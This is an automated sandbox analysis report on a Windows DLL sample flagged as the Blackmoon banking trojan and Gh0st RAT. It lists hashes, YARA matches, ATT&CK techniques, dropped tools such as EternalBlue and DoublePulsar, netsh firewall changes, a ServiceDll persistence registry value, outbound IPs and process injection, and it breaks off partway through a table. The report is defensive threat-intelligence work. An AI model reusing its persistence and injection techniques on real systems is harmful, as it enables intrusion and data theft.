blackmoon | 97da3b940784391248a269926d7a1fc1115f403133f77de2750623e6f7bfc330

Analysis

max time kernel
150s
max time network
150s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
09/03/2025, 05:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

97da3b940784391248a269926d7a1fc1115f403133f77de2750623e6f7bfc330.dll
Size

159KB
MD5

00b7985b67ce3103a463b27a088db1bd
SHA1

8443f0bfc9be9e92e9500fcb3d09fa87aac411e1
SHA256

97da3b940784391248a269926d7a1fc1115f403133f77de2750623e6f7bfc330
SHA512

8b550bf2c5230fb7afad02e716848c8203739ea2d166f4ff89559a0e1cd776faab0459d628fa52c7c4fb8762a25b408c87a94e9879d04f5d1a3f393368dac1c2
SSDEEP

3072:pDPoADAuj34+sqbSFEmjfv2JxhGtBxUYBN46:psAbj3yEmjfvIxhGtBy4N46

Score

10^/10

blackmoon gh0strat banker defense_evasion discovery persistence privilege_escalation rat trojan upx

Malware Config

Signatures

Blackmoon family
blackmoon
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
trojan banker blackmoon

Detect Blackmoon payload 12 IoCs

resource	yara_rule
behavioral1/memory/2740-52-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13553-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13597-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/files/0x0004000000004ed7-13598.dat	family_blackmoon
behavioral1/memory/2740-13610-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13630-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/files/0x000500000001a493-13632.dat	family_blackmoon
behavioral1/memory/5284-13634-0x0000000000400000-0x00000000012FE000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13768-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13794-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13796-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon
behavioral1/memory/2740-13797-0x0000000000400000-0x0000000000D25000-memory.dmp	family_blackmoon

Gh0st RAT payload 14 IoCs

resource	yara_rule
behavioral1/memory/1732-8-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-9-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-10-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-6-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-3-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-2-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-11-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/memory/1732-13626-0x0000000000400000-0x0000000000409000-memory.dmp	family_gh0strat
behavioral1/files/0x000500000001a493-13632.dat	family_gh0strat
behavioral1/memory/5284-13634-0x0000000000400000-0x00000000012FE000-memory.dmp	family_gh0strat
behavioral1/memory/16608-13641-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/16608-13639-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/16608-13646-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat
behavioral1/memory/16608-13637-0x0000000000400000-0x000000000042A000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Gh0strat family
gh0strat
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Downloads MZ/PE file 1 IoCs

flow	pid	Process
8	1732	svchost.exe

Modifies Windows Firewall 2 TTPs 9 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
19060	netsh.exe
18448	netsh.exe
17760	netsh.exe
17448	netsh.exe
19288	netsh.exe
19140	netsh.exe
18852	netsh.exe
18060	netsh.exe
17180	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll = "C:\\Users\\Admin\\AppData\\Roaming\\GraphicsPerfSvcs.dll"	Hooks.exe

Executes dropped EXE 11 IoCs

pid	Process
2740	MpMgSvc.exe
18704	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
868	Wmicc.exe
2940	GetPassword.exe
5284	Hooks.exe
16064	ctfmoon.exe
12148	traffmonetizer.exe
15740	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
10352	traffmonetizer.exe

Loads dropped DLL 63 IoCs

pid	Process
1732	svchost.exe
1732	svchost.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
18704	Eternalblue-2.2.0.exe
2740	MpMgSvc.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
18244	Eternalblue-2.2.0.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
3216	cmd.exe
1732	svchost.exe
1732	svchost.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
2740	MpMgSvc.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
15740	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe
1224	Doublepulsar-1.3.1.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	flow	ioc	pid	Process
Destination IP	10020	124.160.26.219	16608	svchost.exe
Destination IP	4	58.225.0.197	1732	svchost.exe
Destination IP	5749	124.160.26.219	16608	svchost.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8357	api6.my-ip.io

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\GDIPFONTCACHEV1.DAT	traffmonetizer.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\GDIPFONTCACHEV1.DAT	traffmonetizer.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\pid	traffmonetizer.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\pid	traffmonetizer.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\GDIPFONTCACHEV1.DAT	traffmonetizer.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json	traffmonetizer.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1388 set thread context of 1732	1388	rundll32.exe	31
PID 16756 set thread context of 16608	16756	svchost.exe	65

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000017553-16.dat	upx
behavioral1/memory/1732-22-0x0000000003420000-0x0000000003D45000-memory.dmp	upx
behavioral1/memory/2740-52-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13553-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13597-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13610-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/files/0x000500000001a471-13617.dat	upx
behavioral1/memory/1732-13622-0x0000000003420000-0x000000000431E000-memory.dmp	upx
behavioral1/memory/5284-13629-0x0000000000400000-0x00000000012FE000-memory.dmp	upx
behavioral1/memory/2740-13630-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/5284-13634-0x0000000000400000-0x00000000012FE000-memory.dmp	upx
behavioral1/memory/2740-13768-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13794-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13796-0x0000000000400000-0x0000000000D25000-memory.dmp	upx
behavioral1/memory/2740-13797-0x0000000000400000-0x0000000000D25000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ComponentModel.EventBasedAsync.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.Expressions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Http.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.VisualC.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Claims.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.X509Certificates.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Principal.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Collections.Specialized.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Debug.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.UnmanagedMemoryStream.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.Parallel.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.CompilerServices.Unsafe.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.Cryptography.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ComponentModel.dll	svchost.exe
File opened for modification	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.TraceSource.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.IsolatedStorage.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encoding.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Thread.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Globalization.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.Watcher.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.WebSockets.Client.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Overlapped.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XPath.XDocument.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Data.Common.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.Tools.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Drawing.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Numerics.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Security.SecureString.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XDocument.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XmlDocument.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XmlSerializer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.Compression.ZipFile.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Security.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Numerics.Vectors.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Text.Encoding.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.ThreadPool.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Threading.Timer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Traffmonetizer.exe	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\Microsoft.Diagnostics.Runtime.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Linq.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Memory.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.NameResolution.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\netstandard.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.FileSystem.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.IO.Pipes.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.ResourceManager.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Extensions.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Serialization.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Runtime.Serialization.Xml.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.TextWriterTraceListener.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Sockets.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Metadata.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Reflection.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Resources.Writer.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Xml.XPath.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.ComponentModel.Primitives.dll	svchost.exe
File created	C:\Windows\Microsoft.NET\traffmonetizer\System.Net.Ping.dll	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 27 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Wmicc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MpMgSvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Eternalblue-2.2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ctfmoon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Doublepulsar-1.3.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hooks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

Modifies data under HKEY_USERS 30 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}\WpadDecisionTime = 5097027bb490db01	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}\WpadDecision = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}\WpadNetworkName = "Network 3"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-41-b6-26-8b-fd\WpadDecision = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\GDIPlus	traffmonetizer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	traffmonetizer.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\GDIPlus\FontCachePath = "C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local"	traffmonetizer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0182000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-41-b6-26-8b-fd	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}\WpadDecisionReason = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9B0A3B3F-7115-4B91-BB7D-590A262AC6A4}\02-41-b6-26-8b-fd	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	traffmonetizer.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-41-b6-26-8b-fd\WpadDecisionTime = 5097027bb490db01	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\GDIPlus	traffmonetizer.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\02-41-b6-26-8b-fd\WpadDecisionReason = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	traffmonetizer.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2740	MpMgSvc.exe
2940	GetPassword.exe
2940	GetPassword.exe
2940	GetPassword.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
16736	powershell.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
16756	svchost.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe
10352	traffmonetizer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
16608	svchost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2940	GetPassword.exe
Token: SeDebugPrivilege	16736	powershell.exe
Token: SeDebugPrivilege	12148	traffmonetizer.exe
Token: SeDebugPrivilege	10352	traffmonetizer.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
12148	traffmonetizer.exe
10352	traffmonetizer.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2740	MpMgSvc.exe
2740	MpMgSvc.exe
868	Wmicc.exe
5284	Hooks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
PID 1616 wrote to memory of 1388	1616	rundll32.exe	30
